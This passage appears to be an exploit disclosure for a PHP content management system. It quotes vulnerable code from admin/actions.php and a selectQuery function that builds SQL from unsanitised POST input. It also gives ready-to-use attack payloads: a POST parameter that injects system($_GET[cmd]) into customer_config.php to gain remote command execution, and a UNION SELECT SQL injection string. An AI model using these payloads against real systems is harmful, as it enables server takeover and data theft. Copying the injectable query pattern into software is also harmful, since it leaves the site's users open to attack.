else echo "### ERROR: customer_vars.php NOT FOUND ###";
?>
html;
    fputs($fh, $write);
    fclose($fh);

Target:
{POST} ?cmsadmin=1&appendToTitle=";system($_GET[cmd]);die();
http://yousite.com/inc/customer_config.php?cmd=dir

SQL-inj
File: /admin/actions.php
PHP:
if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_POST["createobject"]) && $_POST["objectaction"] === "create") {
    $id = $_POST["docid"];
    $type = $_POST["objtype"];
    $title = $_POST["objtitle"];
    $location = $_POST["objlocation"];
    $container = $_POST["objcontainer"];
    $objlink = $_POST["objlink"];
    $is_copy_of = $_POST["objlinkSubCat"];
    if ($type == "existingContent" && $is_copy_of > 0) {
        $obj_table = $objlink;
        $type = mysql_fetch_array($sqlPtr->selectQuery("file", $tables["object_templates"], "tablename='$objlink'"));
        $type = $type[0];
        $insert_as_copy = true;
    } else {
        $insert_as_copy = false;
        $objlink = "";
        $is_copy_of = "0";
    }

$sqlPtr->selectQuery();
PHP:
function selectQuery($what, $tablename, $where="", $other="") {
    //echo "Lookup: " . $this->antalLookups . "<br>";
    $this->antalLookups++;
    // $this->makeConnection();
    if(strcmp($where,"") != 0) $where = "WHERE $where";
    $q = "SELECT $what FROM $tablename $where $other";
    //echo "Q($q)\n";
    if($this->isDebug){
        echo "Query($q)<br>\n";
        echo "HOST($this->dbhost)<br>\n";
        echo "USER($this->dbusername)<br>\n";
        echo "PASS($this->dbuserpassword)<br>\n";
        echo "DB($this->default_dbname)<br>\n";
    }
    $result= mysql_query($q);
    if(!$result) $this->error_message($this->sql_error() . "<br><b>selectQuery($q) error</b>: $delete connected but not to table" );
    // $this->closeConnection();
    return $result;
}

Target:
{POST} ?objectaction=create&objectcreate=1&objlinkSubCat=1&objtype=existingContent&objlink=1'+union+select+1,2,3,4,5/*